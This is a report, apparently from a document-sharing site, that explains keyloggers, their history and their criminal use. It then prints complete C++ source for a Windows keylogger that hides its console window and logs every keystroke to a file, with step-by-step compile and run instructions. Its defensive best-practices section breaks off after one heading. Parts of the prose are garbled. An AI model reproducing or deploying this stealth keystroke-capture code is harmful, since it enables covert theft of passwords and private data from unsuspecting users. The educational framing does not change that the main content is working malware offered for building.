Professional Documents
Culture Documents
Keylogger Report
Keylogger Report
Keylogger Report
Topic contents
Page | 1
General over of keylogger
What are Keyloggers?
Keyloggers are the kind of malware software that capture anything that
type with user’s keyboard. They also can take image from user’s PC desktop
then send this captured information to predefined email or FTP address. In
many cases, keylogger can spread via Network or Flash memory. Hacker use
wide range of programing language to make keylogger such as C#, VB,
Java. For detecting keyloggers many techniques have made.
It was introduced a technique for dealing with keyloggers that use a
malicious profile for detecting behavioral that similar to keyloggers
behavioral. This approach can fail because in many cases, keyloggers use a
Gmail Service as predefined Address and also use “port 587” for sending
information via email. This behavioral is very similar to email services
software such as Outlook or Firefox Sun Bird. Also, virtual keyboard is
design to deal with keylogger [5], when user use virtual keyboard, user’s
information will not enter via users’ keyboard so keyloggers cannot captured
anything but advanced keylogger can take image from PC desktop then
attacker can guess the password. Another way for dealing with keylogger
use sequence of random characters, in this technique the information that
captured by keyloggers will contain the password, but embedded in so much
random junk that discovering it is infeasible, but this method use simple
mechanism and attacker may detect password [6]. Up-to-date antivirus and
anti-adware tools can help for dealing with keyloggers greatly but we will
show that these softwares can fail against advanced keyloggers [7]. In many
case hackers use a wide range of programing language for making the
keyloggers and antivirus software’s can detect them by analysis the
behavioral of suspicious files. In generally the keyloggers can be divided
into: Detectable keyloggers and undetectable keyloggers
Page | 2
History of the keylogger
In the mid-1970s, the Soviet Union developed and deployed a hardware
keylogger targeting typewriters. Termed the "selectric bug", it measured the
movements of the print head of IBM Selectric typewriters via subtle
influences on the regional magnetic field caused by the rotation and
movements of the print head.[35] An early keylogger was written by Perry
Kivolowitz and posted to the Usenet newsgroup net. Unix-wizards, net.
Sources on November 17, 1983.[36] The posting seems to be a motivating
factor in restricting access to /dev/kmem on Unix systems. The user-mode
program operated by locating and dumping character lists (clients) as they
were assembled in the Unix kernel.
Page | 3
How hackers use keyloggers
The first keyloggers were used by the Soviet Union in the 1970s to monitor
IBM electric typewriters used at embassies based in Moscow. They would
record what was typed and send the information back to Soviet intelligence
via radio signals.
Today spyware such as keystroke loggers are a common part of the cyber-
criminal toolset to capture financial information such as banking and credit
card details, personal information such as emails and password or names
and addresses, or sensitive business information around processes or
intellectual property. They may sell that information or use it as part of a
larger attack depending on what was gathered and their motives.
Install Dev c++ on your system, the installation process is very simple.
Launch it after the installation the interface should look the image below. Go
to the File option at the top you will see New from here choose Source file,
or click on the middle of the IDE and press CTRL+N.
Page | 4
Here is the source code for the C++ Keylogger:
#define _WIN32_WINNT 0x0500
#include <Windows.h>
#include <string>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <fstream>
using namespace std;
void LOG(string input) {
fstream LogFile; LogFile.open("dat.txt", fstream::app);
if (LogFile.is_open()) {
LogFile << input;
LogFile.close();
}
}
bool SpecialKeys(int S_Key) {
switch (S_Key) {
case VK_SPACE: cout << " ";
LOG(" "); return true;
Page | 5
case VK_RETURN: cout << "\n";
LOG("\n"); return true;
case '¾': cout << ".";
LOG("."); return true;
case VK_SHIFT: cout << "#SHIFT#";
LOG("#SHIFT#");
return true;
case VK_BACK: cout << "\b";
LOG("\b"); return true;
case VK_RBUTTON: cout << "#R_CLICK#";
LOG("#R_CLICK#"); return true;
case VK_CAPITAL: cout << "#CAPS_LOCK#";
LOG("#CAPS_LCOK"); return true;
case VK_TAB: cout << "#TAB";
LOG("#TAB"); return true;
case VK_UP: cout << "#UP";
LOG("#UP_ARROW_KEY"); return true;
case VK_DOWN: cout << "#DOWN";
LOG("#DOWN_ARROW_KEY"); return true;
case VK_LEFT: cout << "#LEFT";
LOG("#LEFT_ARROW_KEY"); return true;
case VK_RIGHT: cout << "#RIGHT";
LOG("#RIGHT_ARROW_KEY"); return true;
case VK_CONTROL: cout << "#CONTROL";
LOG("#CONTROL"); return true;
case VK_MENU: cout << "#ALT";
LOG("#ALT"); return true;
default:
return false; }
}
int main(){
ShowWindow(GetConsoleWindow(), SW_HIDE);
Page | 6
char KEY = 'x';
while (true) {
Sleep(10); for (int KEY = 8;
KEY <= 190; KEY++) {
if (GetAsyncKeyState(KEY) == -32767) {
if (SpecialKeys(KEY) == false) {
fstream LogFile;
LogFile.open("dat.txt", fstream::app);
if (LogFile.is_open()) {
LogFile << char(KEY);
LogFile.close();
}
}
}
}
}
return 0;
}
Page | 7
Copy all of the C++ keylogger Source code, and past it on the Dev C++ ide.
To compile it go to the Execute option and choose Compile or
press F9 function key, it will ask you for a location to save your keylogger.
Choose your location and save it to start the compilation process.
After successful compilation, you will see your keylogger in executable form in the folder you
used to save during compiling the C++ keylogger source code.
Now test your keylogger start the application, you nothing because it is coded to run in the
stealth mode in the background. Open a browser and type something, and go to the C++
keylogger folder you will see a text file called dat which have the information you typed.
Page | 8
The figure below shows the data in the dat file
It will keep running in the background unless you stop it. To close the C++ keylogger go to Task
manager by pressing Ctrl+alt+Del. Select the keylogger and choose Endtask.
Page | 9
Conclusion and summary
6 best practices for detecting and removing keyloggers
1. Monitor resource allocation, processes and data
Page | 10